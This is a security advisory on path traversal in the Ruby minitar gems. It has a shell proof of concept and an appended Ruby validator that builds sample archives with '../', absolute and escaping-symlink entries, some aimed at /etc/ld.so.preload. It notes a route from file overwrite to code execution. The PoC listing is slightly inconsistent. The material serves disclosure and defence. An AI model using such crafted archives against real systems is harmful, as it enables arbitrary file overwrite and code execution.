Ruby Gem Minitar Path Traversal

The minitar and archive-tar-minitar gems do not validate entry names when extracting an archive. An entry whose name contains `../` components (or that is a symlink pointing outside the extraction directory) is written wherever the relative path resolves, so a crafted archive can overwrite or create arbitrary files as the extracting user. Writing to a file such as /etc/ld.so.preload or ~/.bashrc turns this into code execution.

Proof of Concept

~/current/tar_symlink $ tar -tvf symlink-overwrite.tar
lrwxrwxrwx  0 0      0           0 Jan  1  1970 ../../../../../../../../../../../../../../tmp/qwerty→

# Actual behaviour:
~/current/tar_symlink $ rm -rf /tmp/qwerty1234
~/current/tar_symlink $ minitar extract symlink-overwrite.tar
~/current/tar_symlink $ ls -al /tmp/qwerty1234
-rwxrwxrwx 1 anon wheel 0 Jan 12 22:44 /tmp/qwerty1234

# Desired behaviour:
~/current/tar_symlink $ tar -xf symlink-overwrite.tar
../../../../../../../../../../../../../../tmp/qwerty1234: Path contains '..'
tar: Error exit delayed from previous errors.
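The check that a safe extractor must perform, as an added example that is not part of this advisory or of the minitar project. It builds a small ustar archive in memory (constructed sample data containing the kinds of entries described above: a `../` name, an absolute name, and a symlink whose target escapes) and, before anything touches the filesystem, resolves each entry against a hypothetical destination directory `/srv/extract` and reports the entries that would land outside it. The helper names (`ustar_header`, `build_archive`, `read_headers`, `safe_entry?`, `unsafe_entries`) are this example's own, not minitar's API.

```ruby
BLOCK = 512

# Build one 512-byte ustar header. Only the fields this demonstration needs
# are set; this is constructed test data, not a real-world archive.
def ustar_header(name, type: '0', linkname: '', size: 0, mode: 0644)
  raise ArgumentError, 'name too long for the 100-byte field' if name.bytesize > 100
  h = ''.b
  h << name.b.ljust(100, "\0")
  h << format('%07o', mode) + "\0"           # mode
  h << format('%07o', 0) + "\0"              # uid
  h << format('%07o', 0) + "\0"              # gid
  h << format('%011o', size) + "\0"          # size
  h << format('%011o', 0) + "\0"             # mtime
  h << ' ' * 8                               # checksum placeholder (spaces)
  h << type                                  # '0' file, '1' hardlink, '2' symlink
  h << linkname.b.ljust(100, "\0")
  h << "ustar\0" << "00"                     # magic + version
  h << ''.ljust(32, "\0") * 2                # uname, gname
  h << (format('%07o', 0) + "\0") * 2        # devmajor, devminor
  h << ''.ljust(155, "\0")                   # prefix
  h = h.ljust(BLOCK, "\0")
  h[148, 8] = format('%06o', h.bytes.sum) + "\0 "
  h
end

def build_archive(entries)
  io = ''.b
  entries.each do |e|
    data = (e[:data] || '').b
    io << ustar_header(e[:name], type: e[:type] || '0',
                       linkname: e[:linkname] || '', size: data.bytesize)
    io << data.ljust(((data.bytesize + BLOCK - 1) / BLOCK) * BLOCK, "\0") unless data.empty?
  end
  io << "\0" * (BLOCK * 2)                   # end-of-archive marker
end

# Walk the headers without extracting anything.
def read_headers(tar)
  entries = []
  off = 0
  while off + BLOCK <= tar.bytesize
    hdr = tar[off, BLOCK]
    break if hdr.bytes.all?(&:zero?)
    name     = hdr[0, 100].sub(/\0.*/m, '')
    prefix   = hdr[345, 155].sub(/\0.*/m, '')
    size     = hdr[124, 12].sub(/\0.*/m, '').strip.oct
    entries << { name: prefix.empty? ? name : File.join(prefix, name),
                 type: hdr[156], linkname: hdr[157, 100].sub(/\0.*/m, ''), size: size }
    off += BLOCK + ((size + BLOCK - 1) / BLOCK) * BLOCK
  end
  entries
end

def inside?(root, path)
  path == root || path.start_with?(root + File::SEPARATOR)
end

# The missing check: the entry's final location, and for links the link
# target, must resolve to a path inside dest. File.join before expand_path so
# that a name beginning with "~" is not expanded to a home directory.
def safe_entry?(dest, entry)
  root = File.expand_path(dest)
  name = entry[:name]
  return false if name.empty? || name.start_with?('/')
  path = File.expand_path(File.join(root, name))
  return false unless inside?(root, path)
  case entry[:type]
  when '2' # symlink target is resolved relative to the link's own directory
    t = entry[:linkname]
    resolved = t.start_with?('/') ? File.expand_path(t) : File.expand_path(File.join(File.dirname(path), t))
    inside?(root, resolved)
  when '1' # hard link names another member, relative to dest
    inside?(root, File.expand_path(File.join(root, entry[:linkname])))
  else
    true
  end
end

def unsafe_entries(tar, dest)
  read_headers(tar).reject { |e| safe_entry?(dest, e) }.map { |e| e[:name] }
end

# Constructed sample archive mirroring the entry kinds the advisory describes.
SAMPLE_TAR = build_archive([
  { name: 'notes/readme.txt', data: 'hello' },
  { name: '../../../../../../../../../../../../../../tmp/qwerty1234', data: 'x' },
  { name: 'link', type: '2', linkname: '../../../../../../../../../../../../../../etc/ld.so.preload' },
  { name: '/etc/ld.so.preload', data: 'x' },
  { name: 'sub/../other.txt', data: 'ok' }
])

if __FILE__ == $0
  read_headers(SAMPLE_TAR).each do |e|
    puts format('%-8s %s', safe_entry?('/srv/extract', e) ? 'OK' : 'REJECT', e[:name])
  end
end
```

This is a lexical check only: it rejects `../` escapes, absolute names and link targets that leave the destination, which is what the PoC above exploits. It does not cover an archive that first creates a symlink to a directory outside dest and then writes a later entry through it; an extractor also has to create files without following symlinks (`File.lstat` each component, or open with `File::NOFOLLOW`) so that earlier entries cannot redirect later ones.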
